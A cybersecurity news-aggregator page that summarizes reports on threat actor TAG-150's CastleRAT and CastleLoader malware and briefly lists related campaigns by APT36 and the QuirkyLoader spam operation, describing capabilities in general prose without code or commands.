CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines, daily updates. Fast, privacy‑respecting. No ads, no tracking.

TAG-150 Develops CastleRAT in Python and C for Expanded Malware Operations

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

TAG-150, a threat actor behind the CastleLoader malware-as-a-service (MaaS) framework, has developed a new remote access trojan (RAT) named CastleRAT. Available in both Python and C variants, CastleRAT can collect system information, execute commands, and download additional payloads. TAG-150 has been active since at least March 2025, using CastleLoader to deliver various secondary payloads, including other RATs, information stealers, and loaders. CastleRAT is part of a multi-tiered infrastructure and uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. The C variant of CastleRAT includes additional functionalities such as keylogging, screenshot capture, and cryptocurrency clipping. The threat actor employs phishing attacks and fraudulent GitHub repositories to initiate infections. Recent developments include the discovery of TinyLoader, TinkyWinkey, and Inf0s3c Stealer, which are used to deliver additional malware and steal information. CastleLoader has been linked to a Play Ransomware attack against a French organization, and TAG-150 operates with a limited and sophisticated user base, likely promoting its services within closed circles.

Timeline

  1. 05.09.2025 17:07 2 articles · 24d ago

    TAG-150 Develops CastleRAT in Python and C

    TAG-150 has been active since at least March 2025, with CastleLoader used in over 1,600 attacks, resulting in nearly 470 successful infections. The threat actor targets critical infrastructure, including a significant number of U.S. government agencies. CastleLoader has been linked to a Play Ransomware attack against a French organization. The C variant of CastleRAT includes features such as a clipper, keylogger, screen capturer, and the ability to terminate browser processes. The Python variant, named PyNightshade, uses UAC Prompt Bombing to bypass security protections and evade sandbox solutions. The article also reveals the sophisticated user base of TAG-150, operating within closed circles, and the potential for future malware development and distribution efforts.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign

APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since August 1, 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated.

Open in new tab

QuirkyLoader Malware Distributes Multiple Payloads via Email Spam Campaigns

A new malware loader, QuirkyLoader, has been observed in email spam campaigns since November 2024. It delivers various payloads, including Agent Tesla, AsyncRAT, and Snake Keylogger. The loader uses DLL side-loading and process hollowing techniques to inject malware into legitimate processes. Two recent campaigns targeted Taiwan and Mexico, focusing on specific organizations and random infections, respectively. The malware employs advanced evasion tactics, such as .NET AOT compilation, and has been used in limited campaigns since July 2025. Additionally, new phishing trends, including QR code phishing and precision-validated phishing, have been observed, highlighting the evolving tactics of threat actors.

Open in new tab